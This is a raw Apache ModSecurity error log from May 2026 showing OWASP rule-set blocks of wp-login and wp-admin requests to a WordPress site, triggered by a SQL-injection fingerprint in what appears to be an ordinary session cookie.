[Mon May 11 22:21:56.042734 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6ZKFW67LJTsgN3jQK6AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:56.591915 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6ZKFW67LJTsgN3jQK6AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:56.949601 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6ZKFW67LJTsgN3jQK7wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:56.949893 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6ZKFW67LJTsgN3jQK7wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:57.491469 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6ZKFW67LJTsgN3jQK7wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:58.258812 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6ZqFW67LJTsgN3jQK8AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:58.259119 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6ZqFW67LJTsgN3jQK8AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:58.646174 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6ZqFW67LJTsgN3jQK8AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:59.650758 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6Z6FW67LJTsgN3jQK8gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:59.651041 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6Z6FW67LJTsgN3jQK8gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:00.309437 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6Z6FW67LJTsgN3jQK8gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:02.341582 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6ano_DFxNSZVmaX3N3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:02.345236 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6ano_DFxNSZVmaX3N3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:02.935485 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6ano_DFxNSZVmaX3N3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:04.461226 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6bHo_DFxNSZVmaX3N4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:04.461773 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6bHo_DFxNSZVmaX3N4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:05.091223 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6bHo_DFxNSZVmaX3N4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:05.438382 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6bXo_DFxNSZVmaX3N4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:05.438668 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6bXo_DFxNSZVmaX3N4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:05.977198 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6bXo_DFxNSZVmaX3N4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:07.035725 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6b3o_DFxNSZVmaX3N4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:07.036013 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6b3o_DFxNSZVmaX3N4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:07.607577 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6b3o_DFxNSZVmaX3N4wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:07.835300 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6b3o_DFxNSZVmaX3N5QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:07.835593 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6b3o_DFxNSZVmaX3N5QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:08.210310 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6b3o_DFxNSZVmaX3N5QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:08.642830 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6cHo_DFxNSZVmaX3N5gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:08.643291 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6cHo_DFxNSZVmaX3N5gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:09.247561 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6cHo_DFxNSZVmaX3N5gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:09.534539 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6cXo_DFxNSZVmaX3N6AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:09.534822 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6cXo_DFxNSZVmaX3N6AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:10.165190 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6cXo_DFxNSZVmaX3N6AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:10.435219 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6cno_DFxNSZVmaX3N6gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:10.435518 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6cno_DFxNSZVmaX3N6gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:11.063781 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6cno_DFxNSZVmaX3N6gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:11.321906 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6c3o_DFxNSZVmaX3N7AAAANE"], referer: https://rentparadise.fr/wp-login.php
